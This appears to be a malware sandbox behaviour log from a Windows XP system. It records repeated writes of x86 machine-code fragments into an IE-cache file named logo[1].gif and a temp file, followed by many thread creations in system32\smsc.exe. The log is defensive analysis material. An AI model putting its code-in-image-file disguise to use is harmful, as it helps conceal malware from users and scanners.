File write	Path: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif Offset: none Length: 514 Value: FF 36 88 45 1F E8 F5 FD FF FF 3C 08 0F 85 12 D4 01 00 8B 75 F8 FF 36 8B 7D 08 57 E8 42 FE FF FF 8B D8 85 DB 0F 84 9C 01 00 00 83 7B 20 00 0F 85 A2 D3 01 00 8B 4D DC FF 15 C0 F1 04 00 8A 45 1B 88 45 F4 85 DB 0F 84 91 00 00 00 8B 4B 04 33 D2 83 F9 FF 89 53 28 74 5F 8B 47 14 2B C2 0F 85 DA D3 01 00 39	success or wait	1811889876
File write	Path: C:\WINDOWS\Temp\pac_00603.tmp Offset: none Length: 514 Value: FF 36 88 45 1F E8 F5 FD FF FF 3C 08 0F 85 12 D4 01 00 8B 75 F8 FF 36 8B 7D 08 57 E8 42 FE FF FF 8B D8 85 DB 0F 84 9C 01 00 00 83 7B 20 00 0F 85 A2 D3 01 00 8B 4D DC FF 15 C0 F1 04 00 8A 45 1B 88 45 F4 85 DB 0F 84 91 00 00 00 8B 4B 04 33 D2 83 F9 FF 89 53 28 74 5F 8B 47 14 2B C2 0F 85 DA D3 01 00 39	success or wait	1811891592
File write	Path: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif Offset: none Length: 514 Value: E9 A7 FC FF FF B8 01 00 01 00 E9 E7 FE FF FF 90 90 90 90 90 8B FF 55 8B EC 83 EC 34 53 56 57 E8 5A F1 FF FF 8B 7D 0C 33 DB 8D 4F 1C 89 45 EC 89 5D F8 FF 15 0C EF 04 00 8D B7 58 01 00 00 88 45 0F 8B 06 3B C3 0F 85 8E CD 01 00 8D 47 28 89 5D D4 8B 48 04 3B CB 0F 85 AD 1E 01 00 8B 00 33 DB 3B C3 75 ED	success or wait	1811894090
File write	Path: C:\WINDOWS\Temp\pac_00603.tmp Offset: none Length: 514 Value: E9 A7 FC FF FF B8 01 00 01 00 E9 E7 FE FF FF 90 90 90 90 90 8B FF 55 8B EC 83 EC 34 53 56 57 E8 5A F1 FF FF 8B 7D 0C 33 DB 8D 4F 1C 89 45 EC 89 5D F8 FF 15 0C EF 04 00 8D B7 58 01 00 00 88 45 0F 8B 06 3B C3 0F 85 8E CD 01 00 8D 47 28 89 5D D4 8B 48 04 3B CB 0F 85 AD 1E 01 00 8B 00 33 DB 3B C3 75 ED	success or wait	1811895393
File write	Path: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif Offset: none Length: 514 Value: FF 33 D2 B9 E8 03 00 00 F7 F1 33 DB 89 5D E0 89 45 D0 E8 90 00 00 00 33 C9 B8 44 3B 05 00 41 F0 0F C1 08 41 69 C9 88 13 00 00 81 F9 60 EA 00 00 0F 84 1E 8D 00 00 39 1D 48 3B 05 00 0F 85 7F 9C 01 00 33 C9 B8 40 3B 05 00 41 F0 0F C1 08 41 69 C9 88 13 00 00 81 F9 60 EA 00 00 8B 3D A8 F1 04 00 0F 84 5D	success or wait	1811897456
File write	Path: C:\WINDOWS\Temp\pac_00603.tmp Offset: none Length: 514 Value: FF 33 D2 B9 E8 03 00 00 F7 F1 33 DB 89 5D E0 89 45 D0 E8 90 00 00 00 33 C9 B8 44 3B 05 00 41 F0 0F C1 08 41 69 C9 88 13 00 00 81 F9 60 EA 00 00 0F 84 1E 8D 00 00 39 1D 48 3B 05 00 0F 85 7F 9C 01 00 33 C9 B8 40 3B 05 00 41 F0 0F C1 08 41 69 C9 88 13 00 00 81 F9 60 EA 00 00 8B 3D A8 F1 04 00 0F 84 5D	success or wait	1811898806
File write	Path: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif Offset: none Length: 514 Value: 0F 84 CD 39 00 00 0F B7 41 1E 8B 44 08 3C 3B C7 89 45 E4 0F 84 A9 E5 01 00 0F B7 48 1E 0F B7 4C 01 20 3B CF 74 07 F6 C1 20 74 02 B2 01 8B 40 18 C1 E8 08 24 01 84 D2 88 45 FF 0F 84 7E 39 00 00 66 8B 46 02 8A E8 8A CC 0F B7 C1 8A 0E 80 E1 F0 80 F9 40 0F 85 9C 39 00 00 3B C3 0F 82 94 39 00 00 3B 45 14	success or wait	1812162663
File write	Path: C:\WINDOWS\Temp\pac_00603.tmp Offset: none Length: 514 Value: 0F 84 CD 39 00 00 0F B7 41 1E 8B 44 08 3C 3B C7 89 45 E4 0F 84 A9 E5 01 00 0F B7 48 1E 0F B7 4C 01 20 3B CF 74 07 F6 C1 20 74 02 B2 01 8B 40 18 C1 E8 08 24 01 84 D2 88 45 FF 0F 84 7E 39 00 00 66 8B 46 02 8A E8 8A CC 0F B7 C1 8A 0E 80 E1 F0 80 F9 40 0F 85 9C 39 00 00 3B C3 0F 82 94 39 00 00 3B 45 14	success or wait	1812164292
File write	Path: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif Offset: none Length: 514 Value: 14 0F 84 DB 37 00 00 FF 75 18 50 56 53 FF 75 F4 FF 75 F8 FF 75 EC FF 75 08 E8 E3 00 00 00 8B 5D CC 85 DB 0F 85 F5 E1 00 00 5F 5E 5B C9 C2 2C 00 90 90 90 90 90 8B FF 55 8B EC 6A 02 58 B9 00 14 05 00 F0 0F C1 01 8B 55 08 83 E0 01 8B C8 C1 E1 04 81 C1 E0 13 05 00 89 0A 5D C2 04 00 90 90 90 90 90 8B FF	success or wait	1812655698
File write	Path: C:\WINDOWS\Temp\pac_00603.tmp Offset: none Length: 514 Value: 14 0F 84 DB 37 00 00 FF 75 18 50 56 53 FF 75 F4 FF 75 F8 FF 75 EC FF 75 08 E8 E3 00 00 00 8B 5D CC 85 DB 0F 85 F5 E1 00 00 5F 5E 5B C9 C2 2C 00 90 90 90 90 90 8B FF 55 8B EC 6A 02 58 B9 00 14 05 00 F0 0F C1 01 8B 55 08 83 E0 01 8B C8 C1 E1 04 81 C1 E0 13 05 00 89 0A 5D C2 04 00 90 90 90 90 90 8B FF	success or wait	1812657358
File write	Path: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif Offset: none Length: 514 Value: 1C E8 DF FE FF FF 8B 45 FC F6 45 F8 80 0F 85 CF DD 01 00 80 3D 2C 3D 05 00 00 8B 55 2C 0F 85 CB DD 01 00 8B 45 2C 89 45 C4 8D 45 F0 50 C7 45 BC 01 00 00 00 89 7D C0 E8 F7 FD FF FF 89 45 EC 8B 45 F0 8B 08 3B C8 89 4D 08 74 47 8D 45 F4 50 6A 14 8D 45 BC 50 8D 45 1B 50 8D 45 D0 50 8B 47 0C 89 75 F4 FF	success or wait	1812659538
File write	Path: C:\WINDOWS\Temp\pac_00603.tmp Offset: none Length: 514 Value: 1C E8 DF FE FF FF 8B 45 FC F6 45 F8 80 0F 85 CF DD 01 00 80 3D 2C 3D 05 00 00 8B 55 2C 0F 85 CB DD 01 00 8B 45 2C 89 45 C4 8D 45 F0 50 C7 45 BC 01 00 00 00 89 7D C0 E8 F7 FD FF FF 89 45 EC 8B 45 F0 8B 08 3B C8 89 4D 08 74 47 8D 45 F4 50 6A 14 8D 45 BC 50 8D 45 1B 50 8D 45 D0 50 8B 47 0C 89 75 F4 FF	success or wait	1812661016
File write	Path: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif Offset: none Length: 514 Value: E7 01 00 8B 45 0C 8B 08 66 8B 41 14 C1 EF 04 A8 01 8B 3C BD C0 F4 04 00 0F 84 4E 06 00 00 8B 49 0C 8B 89 A8 00 00 00 8B F7 F7 D6 23 CE 8B F7 23 F3 0B CE 3B D9 0F 85 31 06 00 00 B0 0B 5F E9 09 F9 FF FF F6 45 14 01 0F 85 78 FA FF FF FF 05 90 F7 04 00 E9 CD FB FF FF 8A CB 80 E1 F0 80 F9 E0 0F 84 5F 3B	success or wait	1813397007
File write	Path: C:\WINDOWS\Temp\pac_00603.tmp Offset: none Length: 514 Value: E7 01 00 8B 45 0C 8B 08 66 8B 41 14 C1 EF 04 A8 01 8B 3C BD C0 F4 04 00 0F 84 4E 06 00 00 8B 49 0C 8B 89 A8 00 00 00 8B F7 F7 D6 23 CE 8B F7 23 F3 0B CE 3B D9 0F 85 31 06 00 00 B0 0B 5F E9 09 F9 FF FF F6 45 14 01 0F 85 78 FA FF FF FF 05 90 F7 04 00 E9 CD FB FF FF 8A CB 80 E1 F0 80 F9 E0 0F 84 5F 3B	success or wait	1813397593
File write	Path: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif Offset: none Length: 514 Value: A1 DC 13 05 00 85 C0 74 2A 83 65 F0 00 83 65 E4 00 83 65 E8 00 80 3D 2C 3D 05 00 00 8B 57 1C C7 45 08 20 00 00 00 89 55 10 75 08 85 C9 0F 84 2C D1 01 00 80 7E 09 06 75 44 8B 43 0C 83 B8 8C 00 00 00 07 0F 85 A5 9E 01 00 83 7F 10 00 74 1D 64 0F B6 05 51 00 00 00 8B 4B 0C 8B 89 80 01 00 00 3B C8 0F 85	success or wait	1813398487
File write	Path: C:\WINDOWS\Temp\pac_00603.tmp Offset: none Length: 514 Value: A1 DC 13 05 00 85 C0 74 2A 83 65 F0 00 83 65 E4 00 83 65 E8 00 80 3D 2C 3D 05 00 00 8B 57 1C C7 45 08 20 00 00 00 89 55 10 75 08 85 C9 0F 84 2C D1 01 00 80 7E 09 06 75 44 8B 43 0C 83 B8 8C 00 00 00 07 0F 85 A5 9E 01 00 83 7F 10 00 74 1D 64 0F B6 05 51 00 00 00 8B 4B 0C 8B 89 80 01 00 00 3B C8 0F 85	success or wait	1813400538
File write	Path: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif Offset: none Length: 514 Value: 75 0C FF 77 1C E8 28 00 00 00 85 C0 0F 84 1C 0B 00 00 8B F7 85 F6 0F 84 7F 5A 02 00 85 DB 0F 85 D6 3D 00 00 8B C6 5B 5E 5F 5D C2 10 00 90 90 90 90 90 8B FF 55 8B EC 8B 45 08 8B 80 A4 00 00 00 85 C0 74 19 F6 40 14 01 0F 84 34 09 00 00 8B 48 04 3B 4D 0C 0F 85 28 09 00 00 33 C0 40 5D C2 08 00 66 03 06	success or wait	1813403340
File write	Path: C:\WINDOWS\Temp\pac_00603.tmp Offset: none Length: 514 Value: 75 0C FF 77 1C E8 28 00 00 00 85 C0 0F 84 1C 0B 00 00 8B F7 85 F6 0F 84 7F 5A 02 00 85 DB 0F 85 D6 3D 00 00 8B C6 5B 5E 5F 5D C2 10 00 90 90 90 90 90 8B FF 55 8B EC 8B 45 08 8B 80 A4 00 00 00 85 C0 74 19 F6 40 14 01 0F 84 34 09 00 00 8B 48 04 3B 4D 0C 0F 85 28 09 00 00 33 C0 40 5D C2 08 00 66 03 06	success or wait	1813404404
File write	Path: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif Offset: none Length: 514 Value: FC 83 7D FC 01 0F 84 6E DD 01 00 C9 C2 04 00 3B 75 FC 74 0C 8B 4D F8 3B 4E 0C 0F 84 B5 E0 01 00 8B 36 E9 AF F9 FF FF 8B 47 0C 8A 80 36 01 00 00 84 C0 0F 84 61 F4 FF FF E9 89 D9 01 00 FF 05 90 F7 04 00 A8 01 0F 85 38 01 00 00 E9 E5 EA 01 00 05 E8 03 00 00 C7 45 CC 01 00 00 00 A3 E0 95 05 00 E9 95 E4	success or wait	1813827067
File write	Path: C:\WINDOWS\Temp\pac_00603.tmp Offset: none Length: 514 Value: FC 83 7D FC 01 0F 84 6E DD 01 00 C9 C2 04 00 3B 75 FC 74 0C 8B 4D F8 3B 4E 0C 0F 84 B5 E0 01 00 8B 36 E9 AF F9 FF FF 8B 47 0C 8A 80 36 01 00 00 84 C0 0F 84 61 F4 FF FF E9 89 D9 01 00 FF 05 90 F7 04 00 A8 01 0F 85 38 01 00 00 E9 E5 EA 01 00 05 E8 03 00 00 C7 45 CC 01 00 00 00 A3 E0 95 05 00 E9 95 E4	success or wait	1813827671
File write	Path: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif Offset: none Length: 514 Value: 14 08 74 62 8B 45 F0 39 47 0C 75 5A 57 FF 75 28 FF 75 14 FF 75 10 E8 57 00 00 00 84 C0 0F 84 E6 7D 01 00 FF 75 2C 8B 46 0C FF 75 28 89 45 20 8B 5E 08 33 C0 40 50 FF 75 24 89 45 F8 8B 45 0C 56 FF 75 1C FF 75 18 FF 70 04 FF 77 04 FF 75 14 FF 75 10 57 FF 55 08 85 C0 75 03 21 45 F4 8B 45 20 89 5E 08 89	success or wait	1813828571
File write	Path: C:\WINDOWS\Temp\pac_00603.tmp Offset: none Length: 514 Value: 14 08 74 62 8B 45 F0 39 47 0C 75 5A 57 FF 75 28 FF 75 14 FF 75 10 E8 57 00 00 00 84 C0 0F 84 E6 7D 01 00 FF 75 2C 8B 46 0C FF 75 28 89 45 20 8B 5E 08 33 C0 40 50 FF 75 24 89 45 F8 8B 45 0C 56 FF 75 1C FF 75 18 FF 70 04 FF 77 04 FF 75 14 FF 75 10 57 FF 55 08 85 C0 75 03 21 45 F4 8B 45 20 89 5E 08 89	success or wait	1813829052
File write	Path: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif Offset: none Length: 514 Value: DC 66 8B 46 02 66 89 45 E4 FF D3 83 3D 9C 96 05 00 00 88 45 28 0F 85 E9 B0 02 00 80 7D 2C 00 0F 84 56 BC 00 00 FF 75 0C FF 15 00 98 05 00 6A 00 FF 75 08 88 45 2F FF 15 48 98 05 00 89 45 18 8D 45 EC 50 33 C0 66 8B 46 02 6A 11 50 FF 75 14 E8 71 04 00 00 85 C0 89 45 08 0F 84 E3 A3 01 00 80 7D 2F 05 0F	success or wait	1813829807
File write	Path: C:\WINDOWS\Temp\pac_00603.tmp Offset: none Length: 514 Value: DC 66 8B 46 02 66 89 45 E4 FF D3 83 3D 9C 96 05 00 00 88 45 28 0F 85 E9 B0 02 00 80 7D 2C 00 0F 84 56 BC 00 00 FF 75 0C FF 15 00 98 05 00 6A 00 FF 75 08 88 45 2F FF 15 48 98 05 00 89 45 18 8D 45 EC 50 33 C0 66 8B 46 02 6A 11 50 FF 75 14 E8 71 04 00 00 85 C0 89 45 08 0F 84 E3 A3 01 00 80 7D 2F 05 0F	success or wait	1813830285
File write	Path: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif Offset: none Length: 514 Value: 08 0F B6 40 08 89 4D D8 89 45 C4 0F 85 B5 7B 01 00 8D 45 D4 50 8B 45 C8 8B 48 08 8B 40 0C 83 C1 08 51 8D 4D CC 51 8B 4D 18 83 C1 F8 51 83 E8 08 50 FF 75 DC 8D 45 E4 FF 75 D8 FF 75 C4 50 6A 16 56 FF 55 A4 80 7D E3 00 8B F0 0F 85 90 7A 01 00 81 FE 16 00 00 C0 0F 84 64 FE 00 00 A1 84 44 05 00 85 C0 0F	success or wait	1814228246
File write	Path: C:\WINDOWS\Temp\pac_00603.tmp Offset: none Length: 514 Value: 08 0F B6 40 08 89 4D D8 89 45 C4 0F 85 B5 7B 01 00 8D 45 D4 50 8B 45 C8 8B 48 08 8B 40 0C 83 C1 08 51 8D 4D CC 51 8B 4D 18 83 C1 F8 51 83 E8 08 50 FF 75 DC 8D 45 E4 FF 75 D8 FF 75 C4 50 6A 16 56 FF 55 A4 80 7D E3 00 8B F0 0F 85 90 7A 01 00 81 FE 16 00 00 C0 0F 84 64 FE 00 00 A1 84 44 05 00 85 C0 0F	success or wait	1814228851
File write	Path: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif Offset: none Length: 514 Value: 74 45 F6 46 25 02 0F 85 9C E9 FF FF 8B 46 2C 3B C7 75 34 66 8B 4D 0C 66 39 4E 30 75 2A 38 5E 32 75 25 83 BE 44 01 00 00 00 0F 85 70 9C 01 00 8B C6 5F 5E 5B 5D C2 14 00 33 C0 EB F5 85 FF 74 F8 33 FF 21 7D 14 EB 93 8B 36 EB A2 90 90 90 90 90 8B FF 55 8B EC 0F B6 45 10 0F B7 4D 0C C1 E0 10 0B C1 03 45	success or wait	1814229668
File write	Path: C:\WINDOWS\Temp\pac_00603.tmp Offset: none Length: 514 Value: 74 45 F6 46 25 02 0F 85 9C E9 FF FF 8B 46 2C 3B C7 75 34 66 8B 4D 0C 66 39 4E 30 75 2A 38 5E 32 75 25 83 BE 44 01 00 00 00 0F 85 70 9C 01 00 8B C6 5F 5E 5B 5D C2 14 00 33 C0 EB F5 85 FF 74 F8 33 FF 21 7D 14 EB 93 8B 36 EB A2 90 90 90 90 90 8B FF 55 8B EC 0F B6 45 10 0F B7 4D 0C C1 E0 10 0B C1 03 45	success or wait	1814230160
File write	Path: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif Offset: none Length: 514 Value: CE FF 15 08 EF 04 00 5E 5B 5D C2 08 00 90 90 90 90 90 8B FF 55 8B EC 81 EC 10 01 00 00 A1 84 F4 04 00 89 45 FC 8B 45 08 89 85 34 FF FF FF 8B 45 10 89 45 98 8B 45 24 53 33 DB FF 05 A4 F7 04 00 89 85 48 FF FF FF 8B 45 2C 56 8B 75 20 89 85 28 FF FF FF 8A 46 0C 24 01 57 8B 7D 0C 89 75 8C 89 5D 90 89 9D	success or wait	1814230924
File write	Path: C:\WINDOWS\Temp\pac_00603.tmp Offset: none Length: 514 Value: CE FF 15 08 EF 04 00 5E 5B 5D C2 08 00 90 90 90 90 90 8B FF 55 8B EC 81 EC 10 01 00 00 A1 84 F4 04 00 89 45 FC 8B 45 08 89 85 34 FF FF FF 8B 45 10 89 45 98 8B 45 24 53 33 DB FF 05 A4 F7 04 00 89 85 48 FF FF FF 8B 45 2C 56 8B 75 20 89 85 28 FF FF FF 8A 46 0C 24 01 57 8B 7D 0C 89 75 8C 89 5D 90 89 9D	success or wait	1814231414
File write	Path: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif Offset: none Length: 514 Value: 02 00 8B 8D 78 FF FF FF FF 15 0C EF 04 00 80 7F 10 07 88 45 A7 0F 84 84 0E 02 00 89 9D 6C FF FF FF 8A 55 A7 8B 8D 78 FF FF FF FF 15 08 EF 04 00 8B 45 B4 89 58 08 8B 45 B4 88 58 1C 8B 45 8C F6 40 0C 01 0F 85 2E 11 02 00 8D 45 AC 50 E8 0C 09 00 00 8B F0 3B F3 89 B5 50 FF FF FF 0F 84 72 26 02 00 6A 10	success or wait	1814232175
File write	Path: C:\WINDOWS\Temp\pac_00603.tmp Offset: none Length: 514 Value: 02 00 8B 8D 78 FF FF FF FF 15 0C EF 04 00 80 7F 10 07 88 45 A7 0F 84 84 0E 02 00 89 9D 6C FF FF FF 8A 55 A7 8B 8D 78 FF FF FF FF 15 08 EF 04 00 8B 45 B4 89 58 08 8B 45 B4 88 58 1C 8B 45 8C F6 40 0C 01 0F 85 2E 11 02 00 8D 45 AC 50 E8 0C 09 00 00 8B F0 3B F3 89 B5 50 FF FF FF 0F 84 72 26 02 00 6A 10	success or wait	1814232802
File write	Path: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif Offset: none Length: 514 Value: 45 90 8B 4D 90 3B CB 89 4E 18 89 4D A0 0F 84 8A 12 02 00 F6 81 B4 00 00 00 08 0F 85 D6 12 02 00 89 5E 28 8B 45 8C F6 40 0C 01 75 16 F6 81 B4 00 00 00 04 0F 85 2D 13 02 00 8B 45 AC 8B 4D 1C 89 48 0C FF 75 18 E8 95 DD FF FF 88 85 5C FF FF FF 8B 45 8C F6 40 0C 01 75 08 39 18 0F 85 AF 2D 00 00 39 5D 80	success or wait	1814233781
File write	Path: C:\WINDOWS\Temp\pac_00603.tmp Offset: none Length: 514 Value: 45 90 8B 4D 90 3B CB 89 4E 18 89 4D A0 0F 84 8A 12 02 00 F6 81 B4 00 00 00 08 0F 85 D6 12 02 00 89 5E 28 8B 45 8C F6 40 0C 01 75 16 F6 81 B4 00 00 00 04 0F 85 2D 13 02 00 8B 45 AC 8B 4D 1C 89 48 0C FF 75 18 E8 95 DD FF FF 88 85 5C FF FF FF 8B 45 8C F6 40 0C 01 75 08 39 18 0F 85 AF 2D 00 00 39 5D 80	success or wait	1814234266
File write	Path: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif Offset: none Length: 514 Value: FF FF FF 8B 00 3B C3 89 85 7C FF FF FF 0F 85 6D FF FF FF 89 1E 8B 7D B4 83 C7 38 89 9D 68 FF FF FF 89 7D 84 FF 15 04 EF 04 00 88 45 A7 8D 85 08 FF FF FF 50 E8 E2 E5 FF FF 89 85 7C FF FF FF 8B 85 08 FF FF FF 8B 70 04 3B F0 74 5B 38 9D 57 FF FF FF 89 9D 68 FF FF FF 0F 85 A2 12 02 00 8D 85 68 FF FF FF	success or wait	1814671111
File write	Path: C:\WINDOWS\Temp\pac_00603.tmp Offset: none Length: 514 Value: FF FF FF 8B 00 3B C3 89 85 7C FF FF FF 0F 85 6D FF FF FF 89 1E 8B 7D B4 83 C7 38 89 9D 68 FF FF FF 89 7D 84 FF 15 04 EF 04 00 88 45 A7 8D 85 08 FF FF FF 50 E8 E2 E5 FF FF 89 85 7C FF FF FF 8B 85 08 FF FF FF 8B 70 04 3B F0 74 5B 38 9D 57 FF FF FF 89 9D 68 FF FF FF 0F 85 A2 12 02 00 8D 85 68 FF FF FF	success or wait	1814673034
File write	Path: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif Offset: none Length: 514 Value: 02 00 8B 85 0C FF FF FF 01 45 14 80 BD 5C FF FF FF 01 0F 84 49 E2 00 00 8B 45 88 8B 4D 14 03 C1 3B 85 60 FF FF FF 0F 87 E8 1B 02 00 8B 45 AC 38 58 08 0F 84 FE 1F 02 00 8B 85 28 FF FF FF 3B C3 74 06 8B 4D 90 89 48 40 39 1D DC 13 05 00 6A 01 FF B5 3C FF FF FF 0F 95 C0 50 FF 75 88 FF 75 A8 FF 75 AC 57	success or wait	1814675617
File write	Path: C:\WINDOWS\Temp\pac_00603.tmp Offset: none Length: 514 Value: 02 00 8B 85 0C FF FF FF 01 45 14 80 BD 5C FF FF FF 01 0F 84 49 E2 00 00 8B 45 88 8B 4D 14 03 C1 3B 85 60 FF FF FF 0F 87 E8 1B 02 00 8B 45 AC 38 58 08 0F 84 FE 1F 02 00 8B 85 28 FF FF FF 3B C3 74 06 8B 4D 90 89 48 40 39 1D DC 13 05 00 6A 01 FF B5 3C FF FF FF 0F 95 C0 50 FF 75 88 FF 75 A8 FF 75 AC 57	success or wait	1814676959
File write	Path: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif Offset: none Length: 514 Value: 45 F8 8B 46 60 0F 95 45 0F 81 7D 10 01 00 00 C0 57 8B 7E 44 89 4D F0 89 45 FC 0F 84 48 F1 01 00 83 65 10 00 0F B7 46 1E 8D 44 30 20 8B 40 08 85 C0 0F 85 3D F1 01 00 85 FF 0F 85 3D F1 01 00 FF 75 10 6A 01 56 E8 7A FE FF FF 85 C0 74 29 FF 75 10 50 FF 75 F0 FF 55 EC 83 7D FC 00 0F 85 B3 F1 01 00 83 7D	success or wait	1814679066
File write	Path: C:\WINDOWS\Temp\pac_00603.tmp Offset: none Length: 514 Value: 45 F8 8B 46 60 0F 95 45 0F 81 7D 10 01 00 00 C0 57 8B 7E 44 89 4D F0 89 45 FC 0F 84 48 F1 01 00 83 65 10 00 0F B7 46 1E 8D 44 30 20 8B 40 08 85 C0 0F 85 3D F1 01 00 85 FF 0F 85 3D F1 01 00 FF 75 10 6A 01 56 E8 7A FE FF FF 85 C0 74 29 FF 75 10 50 FF 75 F0 FF 55 EC 83 7D FC 00 0F 85 B3 F1 01 00 83 7D	success or wait	1814681559
File write	Path: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif Offset: none Length: 514 Value: 0C FF 35 38 3E 05 00 E8 A2 01 00 00 85 C0 74 07 0F B6 4D 10 89 48 14 5D C2 0C 00 80 7D 10 60 77 F6 E9 D3 9A 01 00 90 90 90 90 90 8B FF 55 8B EC 51 51 8B 45 0C 83 65 F8 00 8B 00 57 8B 7D 08 80 7F 6A 00 89 45 FC 0F 85 A3 A4 01 00 53 56 8D 4F 20 FF 15 0C EF 04 00 8B 5D 18 85 DB 88 45 0C 0F 85 94 A4 01	success or wait	1814683652
File write	Path: C:\WINDOWS\Temp\pac_00603.tmp Offset: none Length: 514 Value: 0C FF 35 38 3E 05 00 E8 A2 01 00 00 85 C0 74 07 0F B6 4D 10 89 48 14 5D C2 0C 00 80 7D 10 60 77 F6 E9 D3 9A 01 00 90 90 90 90 90 8B FF 55 8B EC 51 51 8B 45 0C 83 65 F8 00 8B 00 57 8B 7D 08 80 7F 6A 00 89 45 FC 0F 85 A3 A4 01 00 53 56 8D 4F 20 FF 15 0C EF 04 00 8B 5D 18 85 DB 88 45 0C 0F 85 94 A4 01	success or wait	1814684988
File write	Path: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif Offset: none Length: 514 Value: 3B 4E 10 0F 87 D2 00 00 00 8B 3E 3B FE 0F 84 1E 0F 00 00 83 C7 FC 8D 4F 10 FF 15 DC EF 04 00 85 C0 0F 84 8D 0E 00 00 8B D8 8B CF B8 00 F0 FF FF 23 C8 3B F9 0F 85 22 A3 02 00 3B 37 0F 85 1A A3 02 00 66 83 7F 0E 00 0F 85 0F A3 02 00 8B CB 23 C8 3B CF 0F 85 03 A3 02 00 66 83 7F 14 00 0F 84 37 FE FF FF	success or wait	1815398378
File write	Path: C:\WINDOWS\Temp\pac_00603.tmp Offset: none Length: 514 Value: 3B 4E 10 0F 87 D2 00 00 00 8B 3E 3B FE 0F 84 1E 0F 00 00 83 C7 FC 8D 4F 10 FF 15 DC EF 04 00 85 C0 0F 84 8D 0E 00 00 8B D8 8B CF B8 00 F0 FF FF 23 C8 3B F9 0F 85 22 A3 02 00 3B 37 0F 85 1A A3 02 00 66 83 7F 0E 00 0F 85 0F A3 02 00 8B CB 23 C8 3B CF 0F 85 03 A3 02 00 66 83 7F 14 00 0F 84 37 FE FF FF	success or wait	1815400045
Thread created	PID: 740 TID: 1036 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1819113405
Thread created	PID: 740 TID: 1460 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1819121781
Thread created	PID: 740 TID: 1516 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1819195945
Thread delayed	Time: 2 TID: 2376	success or wait	1819784201
Thread created	PID: 740 TID: 340 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1819788011
Thread created	PID: 740 TID: 524 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1819877101
Thread created	PID: 740 TID: 920 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1819979015
Thread created	PID: 740 TID: 580 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1820114144
Thread created	PID: 740 TID: 508 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1820205666
Thread created	PID: 740 TID: 724 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1820314897
Thread created	PID: 740 TID: 160 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1820431263
Thread created	PID: 740 TID: 456 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1820541001
Thread created	PID: 740 TID: 1712 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1820651927
Thread created	PID: 740 TID: 356 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1820766972
Thread created	PID: 740 TID: 412 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1820876924
Thread created	PID: 740 TID: 528 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1820992097
Thread created	PID: 740 TID: 236 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1821101461
Thread created	PID: 740 TID: 1440 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1821212192
Thread created	PID: 740 TID: 368 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1821321568
Thread created	PID: 740 TID: 1632 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1821449789
Thread created	PID: 740 TID: 316 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\smsc.exe Injected: false	success or wait	1821547414
